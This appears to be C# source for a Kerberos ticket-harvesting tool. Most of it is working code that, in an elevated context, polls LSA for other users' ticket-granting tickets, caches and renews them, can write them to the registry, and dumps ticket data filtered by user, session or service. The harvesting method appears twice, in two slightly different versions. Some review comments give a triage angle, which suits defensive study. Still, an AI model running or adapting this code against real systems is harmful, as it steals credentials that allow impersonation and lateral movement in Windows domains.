/// <summary>
/// Polls LSA for ticket-granting tickets in an endless loop and keeps them in the
/// harvester's ticket cache.
/// </summary>
/// <remarks>
/// The method returns immediately, after printing an error, unless
/// <c>Helpers.IsHighIntegrity()</c> reports an elevated context. It has no exit
/// condition of its own: the loop runs until the process is stopped.
///
/// Each cycle:
/// 1. enumerates tickets with the "krbtgt" service filter, narrowed by <c>targetUser</c>;
/// 2. feeds them to the cache, displaying new ones only when <c>renewTickets</c> is false;
/// 3. when <c>renewTickets</c> is set, refreshes the cache and prints the working set once
///    per <c>displayIntervalSeconds</c>;
/// 4. saves the cache through <c>LSA.SaveTicketsToRegistry</c> when <c>registryBasePath</c>
///    is not null;
/// 5. sleeps for <c>monitorIntervalSeconds</c>.
///
/// NOTE(review): the optional registry save is the only on-host persistence visible in
/// this block. When it is configured, the cache is rewritten under that path every cycle,
/// so the key is an artefact worth collecting in triage. The value layout is defined in
/// LSA.SaveTicketsToRegistry, which is not shown here.
/// </remarks>
public void HarvestTicketGrantingTickets()
{
    bool elevated = Helpers.IsHighIntegrity();
    if (!elevated)
    {
        Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");
        return;
    }

    while (true)
    {
        // Per the original author's comment: service filter "krbtgt", full ticket data,
        // silent enumeration. An empty LUID and a null server are passed as the other filters.
        List<LSA.SESSION_CRED> enumerated = LSA.EnumerateTickets(true, new LUID(), "krbtgt", this.targetUser, null, true, true);

        // Flatten every session's tickets into one list of KRB_CRED structures.
        List<KRB_CRED> harvested = new List<KRB_CRED>();
        foreach (var session in enumerated)
        {
            foreach (var entry in session.Tickets)
            {
                harvested.Add(entry.KrbCred);
            }
        }

        if (!renewTickets)
        {
            // "monitor" mode: show tickets as they are added to the cache.
            AddTicketsToTicketCache(harvested, true);
        }
        else
        {
            // "harvest" mode: add quietly; output happens only at display intervals.
            AddTicketsToTicketCache(harvested, false);

            // The one-second allowance on "now" is kept from the original comparison.
            // NOTE(review): DateTime.Now is local wall-clock time, so a clock change
            // moves the display schedule.
            var nextDisplayDue = lastDisplay.AddSeconds(this.displayIntervalSeconds);
            bool displayDue = nextDisplayDue < DateTime.Now.AddSeconds(1);

            if (!displayDue)
            {
                // Refresh/renew the cache without printing the working set.
                RefreshTicketCache();
            }
            else
            {
                this.lastDisplay = DateTime.Now;

                // Refresh/renew the cache and print the working set.
                RefreshTicketCache(true);
                Console.WriteLine("[*] Sleeping until {0} ({1} seconds) for next display\r\n", DateTime.Now.AddSeconds(displayIntervalSeconds), displayIntervalSeconds);
            }
        }

        // Optional registry save of the whole cache, repeated on every cycle.
        if (registryBasePath != null)
        {
            LSA.SaveTicketsToRegistry(harvesterTicketCache, registryBasePath);
        }

        // Wait one monitor interval (seconds converted to milliseconds) before polling again.
        Thread.Sleep(monitorIntervalSeconds * 1000);
    }
}
/// <summary>
/// Parses the optional targeting switches, enumerates Kerberos tickets through
/// <c>LSA.EnumerateTickets</c>, and prints them in the "Full" display format.
/// </summary>
/// <param name="arguments">
/// Switch-to-value map. The keys read are "/luid", "/user", "/service" and "/server".
/// A missing key leaves the matching filter at its default: an empty <c>LUID</c> or
/// an empty string.
/// </param>
/// <remarks>
/// The banner says "All Users" when <c>Helpers.IsHighIntegrity()</c> is true and
/// "Current User" otherwise. This block performs no other privilege check.
/// If a "/luid" value makes the <c>LUID</c> constructor throw, the method prints an
/// error and returns without enumerating anything.
/// </remarks>
public void Execute(Dictionary<string, string> arguments)
{
    // Both banners are plain strings, so the same Console.WriteLine(string) overload is used.
    Console.WriteLine(Helpers.IsHighIntegrity()
        ? "\r\nAction: Dump Kerberos Ticket Data (All Users)\r\n"
        : "\r\nAction: Dump Kerberos Ticket Data (Current User)\r\n");

    LUID targetLuid = new LUID();

    string luidText;
    if (arguments.TryGetValue("/luid", out luidText))
    {
        try
        {
            targetLuid = new LUID(luidText);
        }
        catch
        {
            // Any failure in the LUID constructor is reported as a format error.
            Console.WriteLine("[X] Invalid LUID format ({0})\r\n", luidText);
            return;
        }
    }

    // TryGetValue leaves the out variable null on a miss, so the empty-string
    // default is restored explicitly in each case below.
    string targetUser;
    if (!arguments.TryGetValue("/user", out targetUser))
    {
        targetUser = "";
    }

    string targetService;
    if (!arguments.TryGetValue("/service", out targetService))
    {
        targetService = "";
    }

    string targetServer;
    if (!arguments.TryGetValue("/server", out targetServer))
    {
        targetServer = "";
    }

    // Enumerate tickets (with full data, per the original comment) using the filters above.
    List<LSA.SESSION_CRED> matches = LSA.EnumerateTickets(true, targetLuid, targetService, targetUser, targetServer, true);

    // Print the results in the "Full" format.
    LSA.DisplaySessionCreds(matches, LSA.TicketDisplayFormat.Full);
}
/// <summary>
/// Polls LSA for ticket-granting tickets in a loop, keeps them in the harvester's
/// ticket cache, and can stop after a fixed collection window.
/// </summary>
/// <remarks>
/// The method returns immediately, after printing an error, unless
/// <c>Helpers.IsHighIntegrity()</c> reports an elevated context.
///
/// Each cycle:
/// 1. enumerates tickets with the "krbtgt" service filter, narrowed by <c>targetUser</c>;
/// 2. feeds them to the cache, displaying new ones only when <c>renewTickets</c> is false;
/// 3. when <c>renewTickets</c> is set, refreshes the cache and prints the working set once
///    per <c>displayIntervalSeconds</c>;
/// 4. saves the cache through <c>LSA.SaveTicketsToRegistry</c> when <c>registryBasePath</c>
///    is not null;
/// 5. when <c>runFor</c> is positive and <c>collectionStart + runFor</c> has passed, prints
///    a completion message and ends the whole process with <c>System.Environment.Exit(0)</c>;
/// 6. sleeps for <c>monitorIntervalSeconds</c>, or for the shorter remaining time when the
///    window would end before the next poll.
///
/// With <c>runFor</c> at zero or below the loop never ends on its own.
///
/// NOTE(review): the optional registry save is the only on-host persistence visible in
/// this block. When it is configured, the cache is rewritten under that path every cycle,
/// so the key is an artefact worth collecting in triage. The value layout is defined in
/// LSA.SaveTicketsToRegistry, which is not shown here.
/// </remarks>
public void HarvestTicketGrantingTickets()
{
    bool elevated = Helpers.IsHighIntegrity();
    if (!elevated)
    {
        Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");
        return;
    }

    while (true)
    {
        // Per the original author's comment: service filter "krbtgt", full ticket data,
        // silent enumeration. An empty LUID and a null server are passed as the other filters.
        List<LSA.SESSION_CRED> enumerated = LSA.EnumerateTickets(true, new LUID(), "krbtgt", this.targetUser, null, true, true);

        // Flatten every session's tickets into one list of KRB_CRED structures.
        List<KRB_CRED> harvested = new List<KRB_CRED>();
        foreach (var session in enumerated)
        {
            foreach (var entry in session.Tickets)
            {
                harvested.Add(entry.KrbCred);
            }
        }

        if (!renewTickets)
        {
            // "monitor" mode: show tickets as they are added to the cache.
            AddTicketsToTicketCache(harvested, true);
        }
        else
        {
            // "harvest" mode: add quietly; output happens only at display intervals.
            AddTicketsToTicketCache(harvested, false);

            // The one-second allowance on "now" is kept from the original comparison.
            var nextDisplayDue = lastDisplay.AddSeconds(this.displayIntervalSeconds);
            bool displayDue = nextDisplayDue < DateTime.Now.AddSeconds(1);

            if (!displayDue)
            {
                // Refresh/renew the cache without printing the working set.
                RefreshTicketCache();
            }
            else
            {
                this.lastDisplay = DateTime.Now;

                // Refresh/renew the cache and print the working set.
                RefreshTicketCache(true);
                Console.WriteLine("[*] Sleeping until {0} ({1} seconds) for next display\r\n", DateTime.Now.AddSeconds(displayIntervalSeconds), displayIntervalSeconds);
            }
        }

        // Optional registry save of the whole cache, repeated on every cycle.
        if (registryBasePath != null)
        {
            LSA.SaveTicketsToRegistry(harvesterTicketCache, registryBasePath);
        }

        // Bounded run: once start time + runFor lies in the past, stop the process.
        // Short-circuit evaluation keeps the date comparison from running when runFor <= 0.
        if (runFor > 0 && collectionStart.AddSeconds(this.runFor) < DateTime.Now)
        {
            Console.WriteLine("[*] Completed running for {0} seconds, exiting\r\n", runFor);
            System.Environment.Exit(0);
        }

        // If the run window ends before the next regular poll, sleep only for the time
        // that is left; otherwise sleep one full monitor interval.
        bool windowEndsBeforeNextPoll =
            runFor > 0 &&
            collectionStart.AddSeconds(this.runFor) < DateTime.Now.AddSeconds(monitorIntervalSeconds);

        int sleepMilliseconds;
        if (windowEndsBeforeNextPoll)
        {
            // One second is added to the end of the window, and the cast drops fractional
            // seconds before the conversion to milliseconds, exactly as in the original.
            TimeSpan remaining = collectionStart.AddSeconds(this.runFor + 1) - DateTime.Now;
            int wholeSeconds = (int)remaining.TotalSeconds;
            sleepMilliseconds = wholeSeconds * 1000;
        }
        else
        {
            sleepMilliseconds = monitorIntervalSeconds * 1000;
        }

        Thread.Sleep(sleepMilliseconds);
    }
}